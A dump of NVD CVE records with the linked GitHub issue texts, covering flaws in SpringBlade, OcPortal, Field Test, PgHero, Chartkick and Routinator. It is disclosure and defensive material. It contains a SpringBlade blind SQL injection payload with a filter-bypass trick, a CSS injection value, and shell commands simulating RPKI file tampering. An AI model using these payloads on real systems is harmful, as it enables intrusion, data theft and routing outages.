[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gitee.com/smallc/SpringBlade" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chillzhuang/SpringBlade/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gitee.com/smallc/SpringBlade" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chillzhuang/SpringBlade/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:springblade_project:springblade:*:*:*:*:*:*:*:*", "matchCriteriaId": "376B2181-19A7-4CDA-8254-6741D0DFB32D", "versionEndExcluding": null, "versionEndIncluding": "2.7.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/chillzhuang/SpringBlade/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chillzhuang", "SpringBlade" ]
tl;dr Flaws in DAO/DTO implementation allows SQLi in order by clause. User token and/or password hash disclosed in pre-auth APIs of which are vulnerable to SQLi above as well. detail ``` /api/blade-log/api/list ``` is exposed by default install. For instance, the demo site. ![upload_aaa29b3ad97ede8813529433d5c2c13c](https://user-images.githubusercontent.com/68777488/88458392-51d24980-cec0-11ea-89e4-785dfd673f3c.png) \'Refresh token\' can be used to exchange for a valid jwt ticket, or in a different way to compromise user account, log in with credential cracked from leaking md5 hash. Before actually stepping into the system, let's see what's else we could find on this API. Request handling looks a lot like this ```java=61 /** * 查询多条(分页) */ @GetMapping("/list") public R<IPage<LogUsualVo>> list(@ApiIgnore @RequestParam Map<String, Object> log, Query query) { IPage<LogUsual> pages = logService.page(Condition.getPage(query), Condition.getQueryWrapper(log, LogUsual.class)); List<LogUsualVo> records = pages.getRecords().stream().map(logApi -> { LogUsualVo vo = BeanUtil.copy(logApi, LogUsualVo.class); vo.setStrId(Func.toStr(logApi.getId())); return vo; }).collect(Collectors.toList()); IPage<LogUsualVo> pageVo = new Page<>(pages.getCurrent(), pages.getSize(), pages.getTotal()); pageVo.setRecords(records); return R.data(pageVo); } ``` Condition.getPage() casts a few params to Int and replace 'bad words' with blank string in 'ascs' and 'desc' (which are then pasted into order by clause) ```java public static <T> IPage<T> getPage(Query query) { Page<T> page = new Page((long)Func.toInt(query.getCurrent(), 1), (long)Func.toInt(query.getSize(), 10)); page.setAsc(Func.toStrArray(SqlKeyword.filter(query.getAscs()))); page.setDesc(Func.toStrArray(SqlKeyword.filter(query.getDescs()))); return page; } ``` the Condition.getQueryWrapper() thing is a sort of indicator for batis data model, apart from being a type indicator it is in charge of building statement. after a few delegates and overrides it gets invoked in the way below ```java public static <T> QueryWrapper<T> getQueryWrapper(Map<String, Object> query, Map<String, Object> exclude, Class<T> clazz) { exclude.forEach((k, v) -> { query.remove(k); }); QueryWrapper<T> qw = new QueryWrapper(); qw.setEntity(BeanUtil.newInstance(clazz)); SqlKeyword.buildCondition(query, qw); return qw; } ``` Only seen tokenization stuffs in SqlKeyword.buildCondition(). At this stage, pre-auth visitors can perform SQLi by providing malicious query.get[AD]scs() values, which were directly taken from reuqest as strings, if SqlKeyword.filter() isn't too strong, right? ```java public static String filter(String param) { return param == null ? null : param.replaceAll("(?i)'|%|--|insert|delete|select|count|group|union|drop|truncate|alter|grant|execute|exec|xp_cmdshell|call|declare|sql", ""); } ``` Simply 'double-write' (eg, select -> selselectect) to bypass while doing real world exploitation. filter won't interfere with POCs below. Notice comma char (%2c) gets picked up and replaced in deeper delegate. Iterate placeholder 1 and 97 in URL below (params decoded) from 1 to 20ish and 97 to 123 respectively. ``` /api/blade-log/api/list?ascs=time and ascii(substring(user() from 1))=97 ``` by comparing response length, pick out uncommon returns, record relating iterator nums, gets you a ascii sequence of [98,108,97,100,101,120,?,108,111,99,97,108,104,111,115,116,?\.\.\.\.\.\.] non-lowercase-alphabet chars are marked as '?'. ![upload_9998898e103ce51afaf152eaa9af391e](https://user-images.githubusercontent.com/68777488/88458402-6a426400-cec0-11ea-8960-3bf6dc6023a1.png) this gets you current db user. ```bash >>> ''.join(map(chr,[98,108,97,100,101,120,63,108,111,99,97,108,104,111,115,116])) 'bladex?localhost' ``` post script the actul /api/blade-log/api/list sets a fixed "desc", is vulne to malicious "ascs" only. ```java IPage<LogApi> pages = logService.page(Condition.getPage(query.setDescs("create_time")), Condition.getQueryWrapper(log, LogApi.class)); ```
Pre-auth SQL injection
https://api.github.com/repos/chillzhuang/SpringBlade/issues/9/comments
3
2020-07-25T13:56:47Z
2020-08-27T11:46:37Z
https://github.com/chillzhuang/SpringBlade/issues/9
665,589,577
9
1,367
CVE-2015-9549
2020-08-03T16:15:11.927
A reflected Cross-site Scripting (XSS) vulnerability exists in OcPortal 9.0.20 via the OCF_EMOTICON_CELL.tpl FIELD_NAME field to data/emoticons.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2015-9549-ocportal.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/11" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2015/12/19/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2015-9549-ocportal.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2015/12/19/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ocportal:ocportal:9.0.20:*:*:*:*:*:*:*", "matchCriteriaId": "A2450EFF-5D36-46A0-AAD9-D40F84CA1FDA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
As per the documentation of the Ocportal, a value in a template that is not meant to contain HTML is marked as an escaped value ({VALUE*}). This meant that ‘html entities’ are put in replacement of HTML control characters. ![1](https://cloud.githubusercontent.com/assets/13975575/11140283/d4bd5918-89fe-11e5-8f92-4feb42ae381e.png) ![2](https://cloud.githubusercontent.com/assets/13975575/11140291/f254b62e-89fe-11e5-9e8f-7de91572aaf0.png) Here the VALUE that is marked with \* symbol will be filtered with the XSS filter and it will be sanitized before displaying it to the user. But they forgot to mark FIELD_NAME in OCF_EMOTICON_CELL.tpl file. \ocportal\themes\default\templates\OCF_EMOTICON_CELL.tpl ![3](https://cloud.githubusercontent.com/assets/13975575/11140294/fe5be8fc-89fe-11e5-8700-2ec4cc4a4b15.png) The View_all link besides the emoticons in the following screen is having this FIELD_NAME variable ![4](https://cloud.githubusercontent.com/assets/13975575/11140319/36368cf0-89ff-11e5-870a-5723e26c7f07.png) The View_all link is sending the following GET request to the server ![5](https://cloud.githubusercontent.com/assets/13975575/11140324/48c6c268-89ff-11e5-80c0-059120f7d1b2.png) The following is the source code of emoticons.php file \ocportal\data\emotions.php ![6](https://cloud.githubusercontent.com/assets/13975575/11140330/61fb48e4-89ff-11e5-8ebf-24b769dac0d4.png) The following is the code related to emoticons_script function in misc_scritps.php file \ocportal\sources\misc_scripts.php ![7](https://cloud.githubusercontent.com/assets/13975575/11140346/77638fd4-89ff-11e5-9648-e2592f5167d7.png) Code that is loading the template file with the user entered input \ocportal\sources\misc_scripts.php ![8](https://cloud.githubusercontent.com/assets/13975575/11140377/a3e706bc-89ff-11e5-83d4-1fe70e0d1f39.png) This code is reading the GET request parameter field_name and displaying it back to the user without filtering because of the variable is not marked with \* symbol. Obviously it won’t go for any filtration. GET request to emoticons.php with script vector as value of field_name ![9](https://cloud.githubusercontent.com/assets/13975575/11140391/da542fd6-89ff-11e5-8ef7-49a0106eb4df.png) And the inserted payload is reflecting back to the user as shown in the following screen. ![10](https://cloud.githubusercontent.com/assets/13975575/11140397/e39c7760-89ff-11e5-8b4d-c7261cff633e.png)
OcPortal CMS 9.0.20 POC
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/11/comments
1
2015-11-13T06:56:27Z
2015-12-19T10:52:31Z
https://github.com/cybersecurityworks/Disclosed/issues/11
116,713,139
11
1,368
CVE-2020-16252
2020-08-05T14:15:12.670
The Field Test gem 0.2.0 through 0.3.2 for Ruby allows CSRF.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/field_test" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/field_test/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/field_test" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/field_test/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:field_test_project:field_test:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "D654FEF7-5CF9-4B60-8BB4-684F75AC5950", "versionEndExcluding": null, "versionEndIncluding": "0.3.2", "versionStartExcluding": null, "versionStartIncluding": "0.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/ankane/field_test/issues/28
[ "Third Party Advisory" ]
github.com
[ "ankane", "field_test" ]
The Field Test dashboard is vulnerable to cross-site request forgery (CSRF) with non-session based authentication methods. This vulnerability has been assigned the CVE identifier CVE-2020-16252. Versions Affected: 0.2.0 to 0.3.2 Fixed Versions: 0.4.0 ## Impact The Field Test dashboard is vulnerable to CSRF with non-session based authentication methods, like basic authentication. Session-based authentication methods (like Devise's default authentication) are not affected. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, a single endpoint is affected, which allows for changing the variant assigned to a user. All users running an affected release should upgrade immediately. ## Technical Details Field Test uses the `protect_from_forgery` method from Rails to prevent CSRF. However, this defaults to `:null_session`, which has no effect on non-session based authentication methods. This has been changed to `protect_from_forgery with: :exception`.
CSRF Vulnerability with Non-Session Based Authentication
https://api.github.com/repos/ankane/field_test/issues/28/comments
0
2020-08-04T20:05:09Z
2020-08-04T20:07:49Z
https://github.com/ankane/field_test/issues/28
673,048,818
28
1,369
CVE-2020-16253
2020-08-05T14:15:12.750
The PgHero gem through 2.6.0 for Ruby allows CSRF.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/pghero/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/pghero/issues/330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/pghero/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/pghero/issues/330" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pghero_project:pghero:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "0A0E2E1D-781E-4FDA-88C7-6141B1623113", "versionEndExcluding": null, "versionEndIncluding": "2.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/ankane/pghero/issues/330
[ "Third Party Advisory" ]
github.com
[ "ankane", "pghero" ]
PgHero is vulnerable to cross-site request forgery (CSRF). This vulnerability has been assigned the CVE identifier CVE-2020-16253. Versions Affected: 2.6.0 and below Fixed Versions: 2.7.0 ## Impact The PgHero dashboard is vulnerable to cross-site request forgery (CSRF). This affects the Docker image, Linux packages, and in specific cases, the Ruby gem. The Ruby gem is vulnerable with non-session based authentication methods like basic authentication - session-based authentication methods (like Devise's default authentication) are not affected. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include: 1. Canceling running queries 2. Running `EXPLAIN` on queries (without seeing the results, but can be used for denial of service and other attacks) 3. Resetting query stats (running `pg_stat_statements_reset()`) All users running an affected release should upgrade immediately. ## Credits Thanks to Heiko Webers of https://bauland42.com for reporting this. ## Technical Details PgHero uses the `protect_from_forgery` method from Rails to prevent CSRF. However, this defaults to `:null_session`, which has no effect on non-session based authentication methods. This has been changed to `protect_from_forgery with: :exception`.
CSRF Vulnerability
https://api.github.com/repos/ankane/pghero/issues/330/comments
0
2020-08-04T19:31:45Z
2020-08-04T20:07:44Z
https://github.com/ankane/pghero/issues/330
673,031,545
330
1,370
CVE-2020-16254
2020-08-05T20:15:14.740
The Chartkick gem through 3.3.2 for Ruby allows Cascading Style Sheets (CSS) Injection (without attribute).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/chartkick" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ankane/chartkick/issues/546" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ankane/chartkick" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ankane/chartkick/issues/546" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chartkick_project:chartkick:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "51676149-E541-4385-AD36-8DD8E2AD2593", "versionEndExcluding": null, "versionEndIncluding": "3.3.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/ankane/chartkick/issues/546
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ankane", "chartkick" ]
The Chartkick Ruby gem is vulnerable to CSS injection if user input is passed to the `width` or `height` option. This vulnerability has been assigned the CVE identifier CVE-2020-16254. Versions Affected: 3.3.2 and below Fixed Versions: 3.4.0 ## Impact Chartkick is vulnerable to CSS injection if user input is passed to the `width` or `height` option. ```erb <%= line_chart data, width: params[:width], height: params[:height] %> ``` An attacker can set additional CSS properties, like: ```erb <%= line_chart data, width: "100%; background-image: url('http://example.com/image.png')" %> ``` All users running an affected release should upgrade. ## Technical Details Chartkick uses `ERB::Util.html_escape` to escape the width and height. This prevents XSS, but does not escape semicolons, which allows CSS additional properties to be set. Chartkick now limits width and height values to alphanumeric and % (this prevents some valid values like `calc()` but keeps things simple).
CSS injection with width and height options
https://api.github.com/repos/ankane/chartkick/issues/546/comments
5
2020-08-04T20:29:47Z
2020-10-07T09:50:18Z
https://github.com/ankane/chartkick/issues/546
673,062,235
546
1,371
CVE-2020-17366
2020-08-05T22:15:12.277
An issue was discovered in NLnet Labs Routinator 0.1.0 through 0.7.1. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation List files from the RPKI relying party's view.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/NLnetLabs/routinator/issues/319" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/NLnetLabs/routinator/releases/tag/v0.8.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/NLnetLabs/routinator/issues/319" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/NLnetLabs/routinator/releases/tag/v0.8.0" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nlnetlabs:routinator:*:*:*:*:*:*:*:*", "matchCriteriaId": "C070C598-464A-419E-B545-286D3C3575D6", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartExcluding": null, "versionStartIncluding": "0.1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/NLnetLabs/routinator/issues/319
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "NLnetLabs", "routinator" ]
In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain `.roa` files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsable, CRL exists is valid (also not expired), and manifest is signed with keys not revoked by the CRL), and references files which do not exist in the repository at hand, the publication point should be considered compromised. So in the case of APNIC where an End User (self-hosted) RPKI publication point misses a few .roa files, the validator can proceed to consider all data from all RPs it could reach eligible for further validation, except any data from the publication point where files were missing. In other words: if one or a few files are missing from the repository, the repository should be considered 'down', and no attempt should be made to start guessing what can be salvaged and what not. To offer an example: In manifest `1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft`, a number of ROAs and a CRL are referenced: ``` 1-tcQDnftkRnWbiMhu2cR1-dgmCs.crl IM3xMiMU1QChuWMOGgnbDwYolrU.roa LkKeUPYrfgzjsOIejLjsHGk44cU.roa LkKeUPYrfgzjsOIejLjsHGk44cU.roa fIeCcC8KpdJQd-olU2APdxNZkyA.roa r5vtD4isKhTzGXNGulSnZ7XCS04.roa r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa ``` If an attacker withholds all but `LkKeUPYrfgzjsOIejLjsHGk44cU.roa`, so the MITM does the equivalent of: ``` cd repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/ rm LkKeUPYrfgzjsOIejLjsHGk44cU.roa \ fIeCcC8KpdJQd-olU2APdxNZkyA.roa \ IM3xMiMU1QChuWMOGgnbDwYolrU.roa \ NpI_Uj3OZb6jvwfUTX0-eOk9QV4.roa ``` and the validator does *not* consider `1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft` in its entirety invalid due to one or more missing `.roa` or `.crl` files, in this specific example the remaining ROA will render all BGP announcements equal to or covered under `80.128.0.0/11` `invalid`. This results in actual downtime in real networks. If the manifest (which references a missing `.roa` file in its entirety is ignored or considered invalid), the remaining `r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa` ROA which would've been transformed into VRP `80.128.0.0/11 AS 0` is also ignored. This renders all BGP announcements under that /11 `not-found` rather than `invalid`, which is a preferable situation. `rpki-client` now has a patch where if a file is referenced the manifest, but is missing (either due to CA operational error, or because of a MITM attack - we can't differentiate the two), that specific manifest is considered invalid. It will depend on the structure of how CA Certificate trees whether this measure is sufficient or whether a single missing file has to result in the entire publication point being considered invalid. But until we have more information about other attack vectors, I recommend that a manifest as a whole is considered invalid, when it references a non-existing or wrongly checksummed file. The onus is on the CA publication points to publish correct valid RPKI data, the validator's can't be expected to compensate for CA operator errors (or MITM attacks) An additional check is needed: if one of the .roa files a manifest references is corrupt (the MITM didn't _delete_ strategically file, but filled some .roa files with garbage): ``` echo helewioefwefoibnwef > rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/fIeCcC8KpdJQd-olU2APdxNZkyA.roa ... rpki-client: ...trace: error:0DFFF08E:asn1 encoding routines:CRYPTO_internal:not enough data rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/fIeCcC8KpdJQd-olU2APdxNZkyA.roa: RFC 6488: failed CMS parse ``` corrupting that one .roa file results in an incomplete (operationally problematic) set of VRPs: ``` job@anton ~$ grepcidr 80.128.0.0/11 /var/db/rpki-client/openbgpd 80.128.0.0/12 source-as 3320 80.128.0.0/11 source-as 0 80.128.0.0/11 source-as 3320 80.144.0.0/13 source-as 3320 80.152.0.0/14 source-as 3320 80.156.0.0/16 source-as 3320 80.157.0.0/16 source-as 3320 80.157.8.0/21 source-as 3320 80.157.16.0/20 source-as 3320 80.158.0.0/17 maxlen 24 source-as 34086 80.159.224.0/19 maxlen 24 source-as 2792 ``` In the above eaxmple there should be ~ 19 VRPs in total, `fIeCcC8KpdJQd-olU2APdxNZkyA.roa` contained 8 VRPs. In summary: If a manifests references a non-existing file, or if there is a checksum mismatch between the hash described in the manifest and the hash as derived from the .roa file, the RP MUST consider the whole manifest invalid and not produce VRPs with the remaining .roa files.
Missing files don't result in a Manifest/PP being considered invalid
https://api.github.com/repos/NLnetLabs/routinator/issues/319/comments
11
2020-04-28T14:53:53Z
2020-09-22T13:30:18Z
https://github.com/NLnetLabs/routinator/issues/319
608,383,235
319
1,372
CVE-2020-16248
2020-08-09T17:15:11.703
Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF. NOTE: follow-on discussion suggests that this might plausibly be interpreted as both intended functionality and also a vulnerability
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/prometheus/blackbox_exporter/issues/669" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://prometheus.io/docs/operating/security/#exporters" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/oss-sec/2020/q3/94" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2020/08/08/12" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2020/08/08/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/prometheus/blackbox_exporter/issues/669" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://prometheus.io/docs/operating/security/#exporters" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/oss-sec/2020/q3/94" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2020/08/08/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://www.openwall.com/lists/oss-security/2020/08/08/3" } ]
